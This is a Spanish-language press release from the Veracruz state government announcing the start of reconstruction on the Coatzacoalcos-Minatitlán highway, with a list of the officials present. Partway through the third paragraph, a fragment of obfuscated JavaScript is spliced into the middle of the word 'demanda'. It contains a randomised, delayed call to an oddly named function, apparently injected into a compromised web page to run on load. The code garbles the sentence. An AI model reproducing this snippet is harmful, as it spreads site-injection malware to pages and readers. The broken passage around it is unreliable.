Inicia Gobernador Yunes reconstrucción de autopista Coatzacoalcos-Minatitlán

28 noviembre, 2017

– También se ampliará de 7.5 a 10 metros la superficie de rodamiento en los dos cuerpos

– La primera etapa quedará concluida en enero

Coatzacoalcos. El gobernador de Veracruz, Miguel Ángel Yunes Linares, dio inicio a la obra de reconstrucción de la autopista Coatzacoalcos-Minatitlán, la cual también contempla ampliar de 7.5 a 10 metros la superficie de rodamiento en los dos cuerpos y se estima que la primera etapa quedará concluida en enero.

La obra se ejecutará derivada del convenio de coordinación entre la Federación, a través de la Secretaría de Comunicaciones y Transportes (SCT), y el Gobierno del Estado de Veracruz.

El Gobernador Yunes afirmó que esta obra se había convertido en una demandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anda sentida de los veracruzanos del sur del Estado desde hace muchos años. “Hoy inicia y ya empieza a generar empleos en su etapa de construcción”.

Durante el inicio de la obra de rehabilitación, estuvieron presentes: la diputada Miriam Judith González Sheridan; el presidente municipal de Minatitlán, Héctor Damián Cheng Barragán; el de Coatzacoalcos, Joaquín Caballero Rosiñol, y el encargado de despacho de la Dirección General del Centro SCT, Tomás Antonio Ibarra García.

Así como, los presidentes municipales de Agua Dulce, Daniel Martínez González; de Cosoleacaque, Ponciano Vázquez Parissi; de Jesús Carranza, Gilberto Guillén Serrano; de Oteapan, Noé Gómez Pérez; de Texistepec, Enrique Antonio Paul; de Nanchital, Brenda Esther Manzanilla Rico; de Hidalgotitlán, Octavio Omar López Castillejos, y de Las Choapas, Marco Antonio Estrada Montiel.

Y los presidentes municipales electos de Nanchital, Zoila Balderas Guzmán; de Ixhuatlán del Sureste, Wilberth Luis Luis; de Texistepec, Saúl Reyes Rodríguez; de Cosoleacaque, Cirilo Vázquez Parissi; de Jesús Carranza, Teresa Guillén Trinidad, y de Minatitlán, el regidor electo Raúl Atanasio Rodríguez Rico.

Fuente: Coordinación General de Comunicación Social